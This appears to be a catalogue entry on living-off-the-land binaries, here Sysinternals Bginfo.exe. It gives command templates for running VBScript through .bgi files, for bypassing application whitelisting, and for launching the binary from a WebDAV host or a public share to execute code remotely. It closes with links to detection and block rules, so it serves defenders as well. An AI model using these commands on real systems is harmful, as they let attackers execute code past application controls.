Bginfo.exe
Background Information Utility included with SysInternals Suite
Paths
no default
Commands
Execute
Execute VBscript code that is referenced within the specified .bgi file.
Use case: Local execution of VBScript
Privileges: User
bginfo.exe {PATH:.bgi} /popup /nolicprompt
AWL Bypass
Execute VBscript code that is referenced within the specified .bgi file.
Use case: Local execution of VBScript
Privileges: User
bginfo.exe {PATH:.bgi} /popup /nolicprompt
Execute
Execute bginfo.exe from a WebDAV server.
Use case: Remote execution of VBScript
Privileges: User
\\10.10.10.10\webdav\bginfo.exe {PATH:.bgi} /popup /nolicprompt
AWL Bypass
Execute bginfo.exe from a WebDAV server.
Use case: Remote execution of VBScript
Privileges: User
\\10.10.10.10\webdav\bginfo.exe {PATH:.bgi} /popup /nolicprompt
Execute
This style of execution may not longer work due to patch.
Use case: Remote execution of VBScript
Privileges: User
\\live.sysinternals.com\Tools\bginfo.exe {PATH_SMB:.bgi} /popup /nolicprompt
AWL Bypass
This style of execution may not longer work due to patch.
Use case: Remote execution of VBScript
Privileges: User
\\live.sysinternals.com\Tools\bginfo.exe {PATH_SMB:.bgi} /popup /nolicprompt
Detection
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_bginfo.yml
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules